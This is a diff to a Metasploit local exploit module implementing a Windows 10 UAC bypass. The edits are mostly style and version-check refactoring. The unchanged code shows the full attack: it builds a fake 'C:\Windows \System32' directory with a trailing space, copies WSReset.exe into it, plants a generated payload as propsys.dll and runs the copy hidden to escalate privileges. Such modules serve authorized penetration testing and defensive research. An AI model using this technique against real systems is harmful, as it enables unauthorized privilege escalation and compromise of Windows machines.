@@ -39,6 +39,8 @@ class MetasploitModule < Msf::Exploit::Local
         'DisclosureDate' => '2019-08-22',
         'Notes' => {
           'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
+          'Stability' => UNKNOWN_STABILITY,
+          'Reliability' => UNKNOWN_RELIABILITY
         },
         'References' => [
           ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'],
@@ -53,13 +55,14 @@ class MetasploitModule < Msf::Exploit::Local
               stdapi_sys_process_execute
             ]
           }
-        },
+        }
       )
     )
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
+    version = get_version_info
+    if version.build_number > Msf::WindowsVersion::Win10_InitialRelease && !version.windows_server? && exists?('C:\\Windows\\System32\\WSReset.exe')
       return CheckCode::Appears
     end
 
@@ -93,9 +96,9 @@ class MetasploitModule < Msf::Exploit::Local
       return
     end
 
-    exploit_win_dir = "C:\\Windows \\"
-    exploit_dir = "C:\\Windows \\System32\\"
-    exploit_file = exploit_dir + "WSReset.exe"
+    exploit_win_dir = 'C:\\Windows \\'
+    exploit_dir = 'C:\\Windows \\System32\\'
+    exploit_file = exploit_dir + 'WSReset.exe'
     unless exists? exploit_win_dir
       print_status("Creating directory '#{exploit_win_dir}'...")
       session.fs.dir.mkdir(exploit_win_dir)
@@ -105,14 +108,14 @@ class MetasploitModule < Msf::Exploit::Local
       session.fs.dir.mkdir(exploit_dir)
     end
     unless exists? exploit_file
-      session.fs.file.copy("C:\\Windows\\System32\\WSReset.exe", exploit_file)
+      session.fs.file.copy('C:\\Windows\\System32\\WSReset.exe', exploit_file)
     end
 
-    payload_dll = "C:\\Windows \\System32\\propsys.dll"
+    payload_dll = 'C:\\Windows \\System32\\propsys.dll'
     print_status("Creating payload '#{payload_dll}'...")
     payload = generate_payload_dll
     write_file(payload_dll, payload)
-    print_status("Executing WSReset.exe...")
+    print_status('Executing WSReset.exe...')
     begin
       session.sys.process.execute("cmd.exe /c \"#{exploit_file}\"", nil, { 'Hidden' => true })
     rescue ::Exception => e
@@ -123,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check_permissions!
     unless check == Exploit::CheckCode::Appears
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
     end
     fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
     # Check if you are an admin
@@ -134,12 +137,10 @@ class MetasploitModule < Msf::Exploit::Local
     if admin_group.nil?
       print_error('Either whoami is not there or failed to execute')
       print_error('Continuing under assumption you already checked...')
+    elsif admin_group
+      print_good('Part of Administrators group! Continuing...')
     else
-      if admin_group
-        print_good('Part of Administrators group! Continuing...')
-      else
-        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
-      end
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
     end
 
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
